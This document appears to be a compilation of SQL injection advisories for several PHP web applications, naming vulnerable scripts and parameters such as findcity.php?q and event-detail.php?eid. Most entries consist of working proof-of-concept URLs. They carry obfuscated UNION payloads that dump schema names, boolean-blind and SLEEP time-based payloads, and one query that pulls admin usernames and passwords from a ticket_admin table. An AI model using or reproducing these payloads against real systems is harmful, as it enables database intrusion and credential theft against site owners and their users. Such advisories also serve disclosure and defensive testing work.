The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/news_detail.php?newid=[SQL] -7'++/*!06666UNION*/(/*!06666SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!06666Select*/+export_set(5,@:=0,(/*!06666select*/+count(*)/*!06666from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!06666table_name*/,0x3c6c693e,2),/*!06666column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+- and http://localhost/[PATH]/event_detail.php?eventid=[SQL] -1'++/*!04444UNION*/(/*!04444SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!04444Select*/+export_set(5,@:=0,(/*!04444select*/+count(*)/*!04444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!04444table_name*/,0x3c6c693e,2),/*!04444column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629,0x37)--+-
The vulnerability allows an attacker to inject sql commands into the 'sourcebus' parameter of the 'booker_details.php' script. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject sql commands by manipulating the 'Projectmain', 'proj_type' and 'searchtext' parameters of the 'search-results.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script.
The vulnerability allows an attacker to inject sql commands into the 'findcity.php' file, which can be used to extract information from the database.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/trailer-detail.php?moid=[SQL] -122'++UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23--+- 2) http://localhost/[PATH]/show-time.php?moid=[SQL] -102'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x7469636b65745f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23))--+- 3) http://localhost/[PATH]/event-detail.php?eid=[SQL] -45'++UNION+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(ticket_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_user,admin_pass,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/findcity.php?q=[SQL] s'+/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230--+- Parameter: q (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: q=s%' AND 6957=6957 AND '%'=' Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: q=s%' AND SLEEP(5) AND '%'='
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/success-story.php?succid=[SQL] -16++/*!02222UNION*/(/*!02222SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929)--+-
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/property-list?tbud=5001-10000[SQL]&quicksrch1= 34 columns Parameter: tbud (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tbud=5001-10000 AND 4719=4719&quicksrch1= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: tbud=5001-10000 AND SLEEP(5)&quicksrch1=
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&report_videos[]=[SQL]&report_submit= http://server/single-video-detail.php?video_id=MTMy&report_videos[]='&report_submit= Parameter: report_videos[] (GET) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) Payload: video_id=MTMy&report_videos[]=1' AND ELT(7764=7764,9174) AND 'BZFh'='BZFh&report_submit= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: video_id=MTMy&report_videos[]=1' AND SLEEP(5) AND 'MRQT'='MRQT&report_submit=
The vulnerability allows an attacker to inject sql commands by sending malicious requests to the vulnerable application. Proof of Concept: 1) http://localhost/[PATH]/categories?subctid=[SQL] -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- 2) http://localhost/[PATH]/categories?&mctid=[SQL] -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
Services By CQR